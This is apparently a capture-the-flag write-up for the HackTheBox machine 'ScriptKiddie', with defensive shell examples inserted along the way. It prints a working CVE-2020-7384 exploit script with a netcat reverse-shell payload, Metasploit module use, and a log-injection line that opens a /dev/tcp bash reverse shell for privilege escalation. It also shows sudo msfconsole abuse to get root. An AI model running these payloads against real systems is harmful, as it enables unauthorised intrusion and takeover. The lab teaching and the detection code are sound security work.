# ScriptKiddie Writeup
![](img/58.png)
## Introduction :
ScriptKiddie is an easy box released in February 2021.
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to find open ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate service versions.
```
[ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/ScriptKiddie]
→ nmap -vvv -p- 10.10.10.226 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
Discovered open port 22/tcp on 10.10.10.226
Discovered open port 5000/tcp on 10.10.10.226

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.79 seconds
```
## **Part 2 : Getting User Access**
Our nmap scan picked up port 5000 so let's investigate it:
![](prg/58_001.png)
There were a lot of rabbit holes on this box early on, so here's the intended way:
![](prg/58_002.png)
Here you see that you are able to upload an Android APK template file, and there is a public exploit for that feature, [CVE-2020-7384](https://www.exploit-db.com/exploits/49491):
![](prg/58_003.png)
So let's save it locally:
```
[ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/ScriptKiddie]
→ vim exploit.py
[ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/ScriptKiddie]
→ cat exploit.py
```

```python
#!/usr/bin/env python3
import subprocess
import tempfile
import os
from base64 import b64encode

# Change me
payload = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 9001 >/tmp/f'

# b64encode to avoid badchars (keytool is picky)
payload_b64 = b64encode(payload.encode()).decode()
# The CN of the signing certificate is what msfvenom later interpolates into a shell command
dname = f"CN='|echo {payload_b64} | base64 -d | sh #"

print(f"[+] Manufacturing evil apkfile")
print(f"Payload: {payload}")
print(f"-dname: {dname}")
print()

tmpdir = tempfile.mkdtemp()
apk_file = os.path.join(tmpdir, "evil.apk")
empty_file = os.path.join(tmpdir, "empty")
keystore_file = os.path.join(tmpdir, "signing.keystore")
storepass = keypass = "password"
key_alias = "signing.key"

# Touch empty_file
open(empty_file, "w").close()

# Create apk_file (a zip containing the empty file is enough to be parsed as an APK)
subprocess.check_call(["zip", "-j", apk_file, empty_file])

# Generate signing key with malicious -dname
subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias, "-storepass", storepass,
                       "-keypass", keypass, "-keyalg", "RSA", "-keysize", "2048", "-dname", dname])

# Sign APK using our malicious dname
subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1", "-keystore", keystore_file,
                       "-storepass", storepass, "-keypass", keypass, apk_file, key_alias])

print()
print(f"[+] Done! apkfile is at {apk_file}")
print(f"Do: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null")
```
You can use this script, or we can just use Metasploit, which has a module for the same bug:
```
msf6 > search venom apk

Matching Modules
================

   #  Name                                                                      Disclosure Date  Rank       Check  Description
   -  ----                                                                      ---------------  ----       -----  -----------
   0  exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection    2020-10-29       excellent  No     Rapid7 Metasploit Framework msfvenom APK Template Command Injection

Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection

msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > show options

Module options (exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.apk          yes       The APK file name

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.0.10        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

   DisablePayloadHandler: True   (no handler will be created!)

Exploit target:

   Id  Name
   --  ----
   0   Automatic
```
Let's setup the required options and generate the apk template:
```
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST tun0
LHOST => tun0
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LPORT 9002
LPORT => 9002
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exploit

[+] msf.apk stored at /home/nothing/.msf4/local/msf.apk
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exit

[ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/ScriptKiddie]
→ cp /home/nothing/.msf4/local/msf.apk .
```
Now let's prepare our netcat to catch the reverse shell on our port 9002, and upload the apk file:
```
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/ScriptKiddie]
→ nc -lvnp 9002
listening on [any] 9002 ...
```
![](prg/58_004.png)
```
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/ScriptKiddie]
→ nc -lvnp 9002
listening on [any] 9002 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.226] 36670
id
uid=1000(kid) gid=1000(kid) groups=1000(kid)
cat ~/user.txt
1dXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
```
And there you go! We have a reverse shell as the kid user, and we can print the user flag.
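The CVE-2020-7384 trick above works because msfvenom read the Owner DN of the template APK's signing certificate and interpolated it into a keytool command line that went through a shell. As an added defender-side example (not the box's code and not Metasploit's), this POSIX shell snippet flags a signer DN that carries shell metacharacters before an APK template is fed to any build or analysis pipeline; `keytool -printcert -jarfile` is the JDK option for reading the signer, and `dn_is_suspicious` and `check_apk_signer` are names chosen here.

```shell
#!/bin/sh
# Added example: detect a signing-certificate DN of the kind CVE-2020-7384
# abuses (e.g. CN='|echo <b64> | base64 -d | sh #). Not the box's or
# Metasploit's code.

# Return 0 (suspicious) when $1 contains characters that have no place in
# an honest X.500 DN but do mean something to a shell: quotes, pipes,
# command separators, redirections, substitution, backticks, '#' and
# newlines. Implemented by deleting those characters and comparing.
dn_is_suspicious() {
    stripped=$(printf '%s' "$1" | tr -d "'\"|;&\$\`(){}<>#\n")
    [ "$stripped" != "$1" ]
}

# Read the signer DN of an APK with the JDK's keytool and test it.
# Exit status: 0 clean, 1 suspicious DN, 2 keytool not installed.
# An unsigned APK yields an empty Owner line and is reported clean here;
# signature validity itself is a separate check (apksigner verify).
check_apk_signer() {
    command -v keytool >/dev/null 2>&1 || return 2
    owner=$(keytool -printcert -jarfile "$1" 2>/dev/null | sed -n 's/^Owner: //p')
    if dn_is_suspicious "$owner"; then
        printf 'SUSPICIOUS signer DN in %s: %s\n' "$1" "$owner"
        return 1
    fi
    printf 'clean signer DN in %s: %s\n' "$1" "$owner"
    return 0
}
```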
## **Part 3 : Getting Root Access**
Now before we enumerate the box let's get a fully interactive TTY shell:
```
which python python3 wget curl
/usr/bin/python3
/usr/bin/wget
/usr/bin/curl

#spawn a TTY with python3
python3 -c 'import pty; pty.spawn("/bin/bash")'

#background the reverse shell process
kid@scriptkiddie:~/html$ ^Z
[1]  + 3083589 suspended  nc -lvnp 9002

#set stty raw and foreground the process
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/ScriptKiddie]
→ stty raw -echo ; fg
[1]  + 3083589 continued  nc -lvnp 9002

#export the SHELL and TERM variables
kid@scriptkiddie:~/html$ export SHELL=bash
kid@scriptkiddie:~/html$ export TERM=screen-256color

#set the TTY rows and columns for vi / nano
kid@scriptkiddie:~/html$ stty rows 40 columns 125
kid@scriptkiddie:~/html$ reset
```
Now that we have a fully interactive TTY shell let's upload linpeas onto the box:
```
[term1]
[ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/ScriptKiddie]
→ cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .

[ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/ScriptKiddie]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...

[term2]
kid@scriptkiddie:~/html$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas.sh
--2021-06-08 12:04:57--  http://10.10.14.13:9090/linpeas.sh
Connecting to 10.10.14.13:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 341863 (334K) [text/x-sh]
Saving to: /tmp/peas.sh

/tmp/peas.sh          100%[====================================================>] 333.85K  2.03MB/s    in 0.2s

2021-06-08 12:04:57 (2.03 MB/s) - /tmp/peas.sh saved [341863/341863]

kid@scriptkiddie:~/html$ chmod +x /tmp/peas.sh
kid@scriptkiddie:~/html$ /tmp/peas.sh
```
![](prg/58_005.png)
Scrolling through the output we see that there is another user on the box named **pwn**:
![](prg/58_006.png)
So let's take a look at that user's home directory:
```
kid@scriptkiddie:~/html$ ls -lash /home/pwn
total 44K
4.0K drwxr-xr-x 6 pwn  pwn  4.0K Feb  3 12:06 .
4.0K drwxr-xr-x 4 root root 4.0K Feb  3 07:40 ..
   0 lrwxrwxrwx 1 root root    9 Feb  3 12:06 .bash_history -> /dev/null
4.0K -rw-r--r-- 1 pwn  pwn   220 Feb 25  2020 .bash_logout
4.0K -rw-r--r-- 1 pwn  pwn  3.7K Feb 25  2020 .bashrc
4.0K drwx------ 2 pwn  pwn  4.0K Jan 28 17:08 .cache
4.0K drwxrwxr-x 3 pwn  pwn  4.0K Jan 28 17:24 .local
4.0K -rw-r--r-- 1 pwn  pwn   807 Feb 25  2020 .profile
4.0K -rw-rw-r-- 1 pwn  pwn    74 Jan 28 16:22 .selected_editor
4.0K drwx------ 2 pwn  pwn  4.0K Feb 10 16:10 .ssh
4.0K drwxrw---- 2 pwn  pwn  4.0K Feb  3 12:00 recon
4.0K -rwxrwxr-- 1 pwn  pwn   250 Jan 28 17:57 scanlosers.sh

kid@scriptkiddie:~/html$ cd /home/pwn
kid@scriptkiddie:/home/pwn$ cat scanlosers.sh
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
```
Here we see a bash script that reads the log file **/home/kid/logs/hackers**, takes everything from the third field of each line onward as an IP address, and runs nmap against each one through `sh -c`. The input isn't sanitized, so let's use it to get a reverse shell:
```
kid@scriptkiddie:/home/pwn$ echo -n "Z Y 10.10.14.13;/bin/bash -c 'bash >& /dev/tcp/10.10.14.13/9003 0>&1' #" >/home/kid/logs/hackers
```
And as soon as we run it we have a reverse shell connection:
```
[ 10.10.14.13/23 ] [ /dev/pts/48 ] [~/HTB/ScriptKiddie]
→ nc -lvnp 9003
listening on [any] 9003 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.226] 53822
id
uid=1001(pwn) gid=1001(pwn) groups=1001(pwn)
```
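The scanlosers.sh script above hands field 3 onward of a log file that the lower-privileged user can write to straight to `sh -c`, which is why a `;` in the log becomes a command run as pwn. As an added example (not the box's script), here is the same scanner with its input validated: each candidate is read as a single field, accepted only if it is a dotted-quad IPv4 address, and passed to nmap as its own argument with no shell in between. It is written in POSIX sh so it also runs under bash; `is_ipv4`, `safe_targets` and `scan_log` are names chosen here.

```shell
#!/bin/sh
# Added example, not the box's scanlosers.sh: the same job with the
# untrusted log validated before anything is executed.

# Return 0 when $1 is exactly four decimal octets in 0..255.
is_ipv4() {
    printf '%s\n' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    old_ifs=$IFS
    IFS=.
    set -- $1
    IFS=$old_ifs
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Read log lines on stdin, take ONLY the third field (the original used
# cut -f3-, which keeps everything after it, ';/bin/bash ...' included),
# keep the ones that validate, and de-duplicate.
safe_targets() {
    while read -r _src _user candidate _rest; do
        is_ipv4 "$candidate" && printf '%s\n' "$candidate"
    done | sort -u
}

# Scan each validated target. nmap gets the address as a plain argument,
# not through sh -c, so even a future validation slip cannot splice in a
# command. $1 defaults to the path the box's script uses.
scan_log() {
    log=${1:-/home/kid/logs/hackers}
    [ -r "$log" ] || return 1
    safe_targets < "$log" | while read -r ip; do
        nmap --top-ports 10 -oN "recon/$ip.nmap" "$ip" >/dev/null 2>&1 &
    done
    return 0
}
```

Fed the exact line written to the log above, `safe_targets` prints nothing, because `10.10.14.13;/bin/bash` is not an address.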
This time we get access as the pwn user, so let's spawn a fully interactive TTY just like we did before:
```
python3 -c 'import pty; pty.spawn("/bin/bash")'
pwn@scriptkiddie:~$ ^Z
[1]  + 3150958 suspended  nc -lvnp 9003

[ 10.10.14.13/23 ] [ /dev/pts/48 ] [~/HTB/ScriptKiddie]
→ stty raw -echo ; fg
[1]  + 3150958 continued  nc -lvnp 9003
export TERM=screen-256color
pwn@scriptkiddie:~$ export SHELL=bash
pwn@scriptkiddie:~$ stty rows 40 columns 200
pwn@scriptkiddie:~$ reset
```
Now we run linpeas once again:
```
pwn@scriptkiddie:~$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas.sh ; chmod +x /tmp/peas.sh ; /tmp/peas.sh
```
This time we see the following:
![](prg/58_007.png)
Apparently the pwn user can run **metasploit** as the root user, so let's do it:
```
pwn@scriptkiddie:~$ sudo -l
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole

pwn@scriptkiddie:~$ sudo /opt/metasploit-framework-6.0.9/msfconsole

       =[ metasploit v6.0.9-dev                          ]
+ -- --=[ 2069 exploits - 1122 auxiliary - 352 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Display the Framework log using the log command, learn more with help log

msf6 > bash
[*] exec: bash

root@scriptkiddie:/home/pwn# id
uid=0(root) gid=0(root) groups=0(root)
root@scriptkiddie:/home/pwn# cat /root/root.txt
87XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
```
And there you go! We managed to get a root shell and print the root flag.
## **Conclusion**
Here we can see the progress graph:
![](img/58_graph.png)